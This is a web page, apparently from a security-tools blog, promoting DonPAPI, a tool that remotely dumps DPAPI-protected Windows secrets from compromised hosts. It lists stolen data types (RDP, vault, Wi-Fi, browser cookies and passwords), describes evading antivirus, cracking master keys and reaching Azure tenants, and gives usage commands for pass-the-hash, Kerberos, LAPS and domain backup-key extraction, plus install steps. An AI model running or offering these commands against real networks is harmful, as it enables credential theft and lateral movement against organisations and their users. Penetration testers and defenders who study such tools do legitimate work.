Search Suggest

DonPAPI : Dumping DPAPI Credential Remotely

DonPAPI : Dumping DPAPI Credential Remotely
Dumping relevant information on compromised targets without AV detection.

DPAPI dumping

Lots of credentials are protected by DPAPI.

We aim at locating those "secured" credentials, and retrieve them using :

  • User Password
  • Domaine DPAPI BackupKey
  • Local machine DPAPI Key (protecting TaskScheduled blob)

Currently gathered info

  • Windows credentials (Taskscheduled credentials & a lot more)
  • Windows Vaults
  • Windows RDP credentials
  • AdConnect (still require a manual operation)
  • Wifi key
  • Internet explorer Credentials
  • Chrome cookies & Credentials
  • Firefox cookies & Credentials
  • VNC passwords
  • mRemoteNG password (with default config)

Operational use

With a local admin account on a host, we can :

  • Gather machine-protected DPAPI secrets
    • ScheduledTask that will contain the cleartext login/password of the account configured to run the task
    • Wi-Fi passwords
  • Extract Masterkey's hash value for every user profile (master keys are protected by the user's password, let's try to crack them with Hashcat)
  • Identify who is connected from where in order to identify the admin's personal computers.
  • Extract other non-dpapi protected secrets (VNC/Firefox/mRemoteNG)
  • Gather protected secrets from IE, Chrome, and Firefox and start reaching the Azure tenant.

With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.

Usage

Dump all secrets of the target machine with an admin account :

DonPAPI.py domain/user:[email protected]

Using the user's hash

DonPAPI.py --hashes <LM>:<NT> domain/[email protected]

Using kerberos (-k) and local auth (-local_auth)

DonPAPI.py -k domain/[email protected]
DonPAPI.py -local_auth [email protected]

Using a user with LAPS password reading rights

DonPAPI.py -laps domain/user:[email protected]

It is also possible to provide the tool with a list of credentials that will be tested on the target. DonPAPI will try to use them to decipher masterkeys.

This credential file must have the following syntax:

user1:pass1
user2:pass2
...
DonPAPI.py -credz credz_file.txt domain/user:[email protected]

When a domain admin user is available, it is possible to dump the domain backup key using impacket dpapi.py tool.

dpapi.py backupkeys --export -t domain/user:[email protected]_dc_ip

This backup key (pvk file) can then be used to dump all domain user's secrets!

python DonPAPI.py -pvk domain_backupkey.pvk domain/user:[email protected]_network_list

The target can be an IP, IP range, CIDR, or file containing list targets (one per line)

Installation

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry install
poetry run donpapi

or

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py

Get DonPAPI

Post a Comment